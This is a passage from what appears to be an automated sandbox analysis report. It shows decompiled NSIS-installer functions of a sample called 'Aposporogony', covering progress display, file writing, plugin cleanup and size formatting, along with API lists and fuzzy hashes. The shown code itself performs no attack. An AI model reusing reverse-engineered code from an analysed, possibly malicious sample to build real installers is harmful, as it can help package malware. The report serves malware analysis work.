                                                                                                                                                                                      					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                                                                                      					_a8 = 0x113;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(_a8 == 0x113) {
                                                                                                                                                                                      					_t11 = E00402E72();
                                                                                                                                                                                      					_t19 = L"unpacking data: %d%%";
                                                                                                                                                                                      					if( *0x42a254 == 0) {
                                                                                                                                                                                      						_t19 = L"verifying installer: %d%%";
                                                                                                                                                                                      					}
                                                                                                                                                                                      					wsprintfW( &_v132, _t19, _t11);
                                                                                                                                                                                      					SetWindowTextW(_a4,  &_v132);
                                                                                                                                                                                      					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}






                                                                                                                                                                                      0x00402e03
                                                                                                                                                                                      0x00402e11
                                                                                                                                                                                      0x00402e17
                                                                                                                                                                                      0x00402e17
                                                                                                                                                                                      0x00402e25
                                                                                                                                                                                      0x00402e27
                                                                                                                                                                                      0x00402e33
                                                                                                                                                                                      0x00402e38
                                                                                                                                                                                      0x00402e3a
                                                                                                                                                                                      0x00402e3a
                                                                                                                                                                                      0x00402e45
                                                                                                                                                                                      0x00402e55
                                                                                                                                                                                      0x00402e67
                                                                                                                                                                                      0x00402e67
                                                                                                                                                                                      0x00402e6f

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                      • wsprintfW.USER32 ref: 00402E45
                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                                                                                                      • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                                                                                      • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                                                                                                      • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                                                                                      • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                      			E73D2256D() {
                                                                                                                                                                                      				intOrPtr _t24;
                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                      				intOrPtr _t27;
                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                      				intOrPtr _t44;
                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t40 = E73D2121B();
                                                                                                                                                                                      				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                                                                                                                      				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                                                                                                                      				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                                                                                                                      				do {
                                                                                                                                                                                      					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                                                                                                                      					if(_t39 <= 7) {
                                                                                                                                                                                      						switch( *((intOrPtr*)(_t39 * 4 +  &M73D2269C))) {
                                                                                                                                                                                      							case 0:
                                                                                                                                                                                      								 *_t40 = 0;
                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                      							case 1:
                                                                                                                                                                                      								__eax =  *__eax;
                                                                                                                                                                                      								if(__ecx > __ebx) {
                                                                                                                                                                                      									 *(__esp + 0x10) = __ecx;
                                                                                                                                                                                      									__ecx =  *(0x73d2307c + __edx * 4);
                                                                                                                                                                                      									__edx =  *(__esp + 0x10);
                                                                                                                                                                                      									__ecx = __ecx * __edx;
                                                                                                                                                                                      									asm("sbb edx, edx");
                                                                                                                                                                                      									__edx = __edx & __ecx;
                                                                                                                                                                                      									__eax = __eax &  *(0x73d2309c + __edx * 4);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_push(__eax);
                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                      							case 2:
                                                                                                                                                                                      								__eax = E73D21470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                                                                                                      								goto L16;
                                                                                                                                                                                      							case 3:
                                                                                                                                                                                      								__ecx =  *0x73d2406c;
                                                                                                                                                                                      								__edx = __ecx - 1;
                                                                                                                                                                                      								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                                                                                                                      								__eax =  *0x73d2406c;
                                                                                                                                                                                      								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                      							case 4:
                                                                                                                                                                                      								__eax = lstrcpynW(__edi,  *__eax,  *0x73d2406c);
                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                      							case 5:
                                                                                                                                                                                      								_push( *0x73d2406c);
                                                                                                                                                                                      								_push(__edi);
                                                                                                                                                                                      								_push( *__eax);
                                                                                                                                                                                      								__imp__StringFromGUID2();
                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                      							case 6:
                                                                                                                                                                                      								_push( *__esi);
                                                                                                                                                                                      								L15:
                                                                                                                                                                                      								__eax = wsprintfW(__edi, 0x73d24000);
                                                                                                                                                                                      								L16:
                                                                                                                                                                                      								__esp = __esp + 0xc;
                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L17:
                                                                                                                                                                                      					_t26 =  *(_t43 + 0x14);
                                                                                                                                                                                      					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                                                                                                                      						GlobalFree(_t26);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                                                                      						if(_t27 != 0xffffffff) {
                                                                                                                                                                                      							if(_t27 > 0) {
                                                                                                                                                                                      								E73D212E1(_t27 - 1, _t40);
                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							E73D21272(_t40);
                                                                                                                                                                                      							L26:
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t44 = _t44 - 1;
                                                                                                                                                                                      					_t43 = _t43 - 0x20;
                                                                                                                                                                                      				} while (_t44 >= 0);
                                                                                                                                                                                      				return GlobalFree(_t40);
                                                                                                                                                                                      			}











                                                                                                                                                                                      0x73d22577
                                                                                                                                                                                      0x73d22579
                                                                                                                                                                                      0x73d2257d
                                                                                                                                                                                      0x73d2258c
                                                                                                                                                                                      0x73d22590
                                                                                                                                                                                      0x73d22595
                                                                                                                                                                                      0x73d22595
                                                                                                                                                                                      0x73d2259d
                                                                                                                                                                                      0x73d225a4
                                                                                                                                                                                      0x73d225aa
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d225b1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d225b9
                                                                                                                                                                                      0x73d225bd
                                                                                                                                                                                      0x73d225c0
                                                                                                                                                                                      0x73d225c4
                                                                                                                                                                                      0x73d225cb
                                                                                                                                                                                      0x73d225cf
                                                                                                                                                                                      0x73d225d5
                                                                                                                                                                                      0x73d225d7
                                                                                                                                                                                      0x73d225d9
                                                                                                                                                                                      0x73d225d9
                                                                                                                                                                                      0x73d225e0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d225e9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d225f0
                                                                                                                                                                                      0x73d225f6
                                                                                                                                                                                      0x73d22600
                                                                                                                                                                                      0x73d22606
                                                                                                                                                                                      0x73d2260b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d2262c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22612
                                                                                                                                                                                      0x73d22618
                                                                                                                                                                                      0x73d22619
                                                                                                                                                                                      0x73d2261b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22634
                                                                                                                                                                                      0x73d22636
                                                                                                                                                                                      0x73d2263c
                                                                                                                                                                                      0x73d22642
                                                                                                                                                                                      0x73d22642
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d225aa
                                                                                                                                                                                      0x73d22645
                                                                                                                                                                                      0x73d22645
                                                                                                                                                                                      0x73d2264a
                                                                                                                                                                                      0x73d2265b
                                                                                                                                                                                      0x73d2265b
                                                                                                                                                                                      0x73d22661
                                                                                                                                                                                      0x73d22666
                                                                                                                                                                                      0x73d2266b
                                                                                                                                                                                      0x73d22677
                                                                                                                                                                                      0x73d2267c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22681
                                                                                                                                                                                      0x73d2266d
                                                                                                                                                                                      0x73d2266e
                                                                                                                                                                                      0x73d22682
                                                                                                                                                                                      0x73d22682
                                                                                                                                                                                      0x73d2266b
                                                                                                                                                                                      0x73d22683
                                                                                                                                                                                      0x73d22684
                                                                                                                                                                                      0x73d22687
                                                                                                                                                                                      0x73d2269b

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 73D2121B: GlobalAlloc.KERNEL32(00000040,?,73D2123B,?,73D212DF,00000019,73D211BE,-000000A0), ref: 73D21225
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73D2265B
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73D22690
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2059161849.0000000073D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 73D20000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2059082131.0000000073D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059250947.0000000073D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059333077.0000000073D25000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_73d20000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                      • Opcode ID: a4aee0384b5f7eaaf0561f1664b4cbcc687fc84de6dfe627fe26290883fa87b6
                                                                                                                                                                                      • Instruction ID: 7b436c1b01a3860f48f63f749c74a79e99aa261219c96af367d4ad8be45f7ddc
                                                                                                                                                                                      • Opcode Fuzzy Hash: a4aee0384b5f7eaaf0561f1664b4cbcc687fc84de6dfe627fe26290883fa87b6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 71312433604109EFD7669F50CD88F2A7FBAFF9531B7244128F586A3160E735A825CB29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                      			E004028AD(void* __ebx) {
                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                      				void* _t51;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      				void* _t55;
                                                                                                                                                                                      				void* _t56;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t45 = __ebx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
                                                                                                                                                                                      				_t50 = E00402C41(0xfffffff0);
                                                                                                                                                                                      				 *(_t56 - 0x38) = _t23;
                                                                                                                                                                                      				if(E00405D34(_t50) == 0) {
                                                                                                                                                                                      					E00402C41(0xffffffed);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E00405EB9(_t50);
                                                                                                                                                                                      				_t26 = E00405EDE(_t50, 0x40000000, 2);
                                                                                                                                                                                      				 *(_t56 + 8) = _t26;
                                                                                                                                                                                      				if(_t26 != 0xffffffff) {
                                                                                                                                                                                      					_t31 =  *0x42a258;
                                                                                                                                                                                      					 *(_t56 - 0x3c) = _t31;
                                                                                                                                                                                      					_t49 = GlobalAlloc(0x40, _t31);
                                                                                                                                                                                      					if(_t49 != _t45) {
                                                                                                                                                                                      						E0040345D(_t45);
                                                                                                                                                                                      						E00403447(_t49,  *(_t56 - 0x3c));
                                                                                                                                                                                      						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                                                                                                                      						 *(_t56 - 0x4c) = _t54;
                                                                                                                                                                                      						if(_t54 != _t45) {
                                                                                                                                                                                      							E004031D6(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                                                                                                                                      							while( *_t54 != _t45) {
                                                                                                                                                                                      								_t47 =  *_t54;
                                                                                                                                                                                      								_t55 = _t54 + 8;
                                                                                                                                                                                      								 *(_t56 - 0x34) =  *_t54;
                                                                                                                                                                                      								E00405E99( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                                                                                                                      								_t54 = _t55 +  *(_t56 - 0x34);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							GlobalFree( *(_t56 - 0x4c));
                                                                                                                                                                                      						}
                                                                                                                                                                                      						E00405F90( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
                                                                                                                                                                                      						GlobalFree(_t49);
                                                                                                                                                                                      						 *((intOrPtr*)(_t56 - 0x30)) = E004031D6(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					CloseHandle( *(_t56 + 8));
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t51 = 0xfffffff3;
                                                                                                                                                                                      				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
                                                                                                                                                                                      					_t51 = 0xffffffef;
                                                                                                                                                                                      					DeleteFileW( *(_t56 - 0x38));
                                                                                                                                                                                      					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_push(_t51);
                                                                                                                                                                                      				E00401423();
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t56 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}











                                                                                                                                                                                      0x004028ad
                                                                                                                                                                                      0x004028af
                                                                                                                                                                                      0x004028bb
                                                                                                                                                                                      0x004028be
                                                                                                                                                                                      0x004028c8
                                                                                                                                                                                      0x004028cc
                                                                                                                                                                                      0x004028cc
                                                                                                                                                                                      0x004028d2
                                                                                                                                                                                      0x004028df
                                                                                                                                                                                      0x004028e7
                                                                                                                                                                                      0x004028ea
                                                                                                                                                                                      0x004028f0
                                                                                                                                                                                      0x004028fe
                                                                                                                                                                                      0x00402903
                                                                                                                                                                                      0x00402907
                                                                                                                                                                                      0x0040290a
                                                                                                                                                                                      0x00402913
                                                                                                                                                                                      0x0040291f
                                                                                                                                                                                      0x00402923
                                                                                                                                                                                      0x00402926
                                                                                                                                                                                      0x00402930
                                                                                                                                                                                      0x0040294f
                                                                                                                                                                                      0x00402937
                                                                                                                                                                                      0x0040293c
                                                                                                                                                                                      0x00402944
                                                                                                                                                                                      0x00402947
                                                                                                                                                                                      0x0040294c
                                                                                                                                                                                      0x0040294c
                                                                                                                                                                                      0x00402956
                                                                                                                                                                                      0x00402956
                                                                                                                                                                                      0x00402963
                                                                                                                                                                                      0x00402969
                                                                                                                                                                                      0x0040297b
                                                                                                                                                                                      0x0040297b
                                                                                                                                                                                      0x00402981
                                                                                                                                                                                      0x00402981
                                                                                                                                                                                      0x0040298c
                                                                                                                                                                                      0x0040298d
                                                                                                                                                                                      0x00402991
                                                                                                                                                                                      0x00402995
                                                                                                                                                                                      0x0040299b
                                                                                                                                                                                      0x0040299b
                                                                                                                                                                                      0x004029a2
                                                                                                                                                                                      0x0040224b
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                                      • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                                                                                                      • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                                                                                                      • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                      			E00404C0C(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                                      				char _v68;
                                                                                                                                                                                      				char _v132;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                      				void* _t31;
                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                      				void* _t44;
                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t23 = _a16;
                                                                                                                                                                                      				_t53 = _a12;
                                                                                                                                                                                      				_t44 = 0xffffffdc;
                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                      					_push(0x14);
                                                                                                                                                                                      					_pop(0);
                                                                                                                                                                                      					_t24 = _t53;
                                                                                                                                                                                      					if(_t53 < 0x100000) {
                                                                                                                                                                                      						_push(0xa);
                                                                                                                                                                                      						_pop(0);
                                                                                                                                                                                      						_t44 = 0xffffffdd;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t53 < 0x400) {
                                                                                                                                                                                      						_t44 = 0xffffffde;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t53 < 0xffff3333) {
                                                                                                                                                                                      						_t52 = 0x14;
                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                      						_t24 = 1 / _t52 + _t53;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t25 = _t24 & 0x00ffffff;
                                                                                                                                                                                      					_t55 = _t24 >> 0;
                                                                                                                                                                                      					_t46 = 0xa;
                                                                                                                                                                                      					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                                                                                                                      					_t50 = 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t31 = E0040640A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                                                                                                                      				_t33 = E0040640A(_t44, _t50, _t55,  &_v132, _t44);
                                                                                                                                                                                      				_t34 = E0040640A(_t44, _t50, 0x423728, 0x423728, _a8);
                                                                                                                                                                                      				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                                                                                                                      				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
                                                                                                                                                                                      			}



















                                                                                                                                                                                      0x00404c15
                                                                                                                                                                                      0x00404c1a
                                                                                                                                                                                      0x00404c22
                                                                                                                                                                                      0x00404c23
                                                                                                                                                                                      0x00404c30
                                                                                                                                                                                      0x00404c38
                                                                                                                                                                                      0x00404c39
                                                                                                                                                                                      0x00404c3b
                                                                                                                                                                                      0x00404c3d
                                                                                                                                                                                      0x00404c3f
                                                                                                                                                                                      0x00404c42
                                                                                                                                                                                      0x00404c42
                                                                                                                                                                                      0x00404c49
                                                                                                                                                                                      0x00404c4f
                                                                                                                                                                                      0x00404c4f
                                                                                                                                                                                      0x00404c56
                                                                                                                                                                                      0x00404c5d
                                                                                                                                                                                      0x00404c60
                                                                                                                                                                                      0x00404c63
                                                                                                                                                                                      0x00404c63
                                                                                                                                                                                      0x00404c67
                                                                                                                                                                                      0x00404c77
                                                                                                                                                                                      0x00404c79
                                                                                                                                                                                      0x00404c7c
                                                                                                                                                                                      0x00404c25
                                                                                                                                                                                      0x00404c25
                                                                                                                                                                                      0x00404c2c
                                                                                                                                                                                      0x00404c2c
                                                                                                                                                                                      0x00404c84
                                                                                                                                                                                      0x00404c8f
                                                                                                                                                                                      0x00404ca5
                                                                                                                                                                                      0x00404cb6
                                                                                                                                                                                      0x00404cd2

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                      • String ID: %u.%u%s%s$(7B
